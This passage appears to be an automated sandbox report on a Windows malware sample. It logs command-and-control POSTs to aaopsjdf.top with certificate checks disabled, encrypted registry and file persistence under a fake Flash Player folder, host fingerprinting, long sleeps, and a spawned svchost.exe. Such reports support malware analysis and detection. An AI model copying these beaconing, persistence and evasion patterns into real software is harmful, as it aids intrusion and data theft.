Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ‘° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g False 1
Fn
Inet Send HTTP Request headers = Connection: close ‘° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:59 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ‘@ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew False 1
Fn
Inet Send HTTP Request headers = Connection: close ‘@ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:57:00 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ‘@ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw False 1
Fn
Inet Send HTTP Request headers = Connection: close ‘@ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:57:01 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ‘H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA False 1
Fn
Inet Send HTTP Request headers = Connection: close ‘H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Thread 0x5b0
(Host: 27, Network: 22)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:44 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
System Get Info type = Hardware Information True 2
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.google.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close , url = www.google.com/ True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 635 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 31652 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG True 6
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw False 1
Fn
Inet Send HTTP Request headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 236 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Sleep duration = 600000 milliseconds (600.000 seconds) True 1
Fn
Thread 0x7d0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
System Sleep duration = 20000 milliseconds (20.000 seconds) True 1
Fn
Thread 0x770
(Host: 38, Network: 12)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = A354992B05F4DA0EB1B4AB788E3CE988 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:48 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ր, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/ False 1
Fn
Inet Send HTTP Request headers = Connection: close ր, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 1688 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:49 (UTC) True 1
Fn
Mutex Create mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, type = file_attributes True 10
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, size = 171 True 1
Fn
Data
Process #17: svchost.exe
(Host: 690, Network: 0)
+
Information Value
ID #17
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:12, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:05:01
OS Process Information
+
Information Value
PID 0x7f8
Parent PID 0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7E4
0x 350
0x 114
0x 614
0x 718
0x 59C
0x 60C
0x 4F8
0x 460
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x0008bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009bfff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x000bffff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False
private_0x0000000000170000 0x00170000 0x001effff Private Memory Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False
locale.nls 0x003c0000 0x00426fff Memory Mapped File Readable False False False
private_0x0000000000430000 0x00430000 0x004affff Private Memory Readable, Writable True False False
rsaenh.dll 0x004b0000 0x004ebfff Memory Mapped File Readable False False False
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False
private_0x0000000000550000 0x00550000 0x0055ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006f0000 0x006f0000 0x00870fff Pagefile Backed Memory Readable True False False
private_0x0000000000910000 0x00910000 0x0094ffff Private Memory Readable, Writable True False False
svchost.exe 0x00960000 0x00967fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001d70000 0x01d70000 0x02162fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02170000 0x0243efff Memory Mapped File Readable False False False
private_0x0000000002450000 0x02450000 0x0248ffff Private Memory Readable, Writable True False False
private_0x00000000024c0000 0x024c0000 0x024fffff Private Memory Readable, Writable True False False
private_0x0000000002510000 0x02510000 0x0254ffff Private Memory Readable, Writable True False False
private_0x0000000002550000 0x02550000 0x0258ffff Private Memory Readable, Writable True False False
private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False
private_0x0000000002650000 0x02650000 0x0268ffff Private Memory Readable, Writable True False False
private_0x00000000026f0000 0x026f0000 0x0272ffff Private Memory Readable, Writable True False False
private_0x0000000002770000 0x02770000 0x027affff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x0288ffff Private Memory Readable, Writable True False False
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
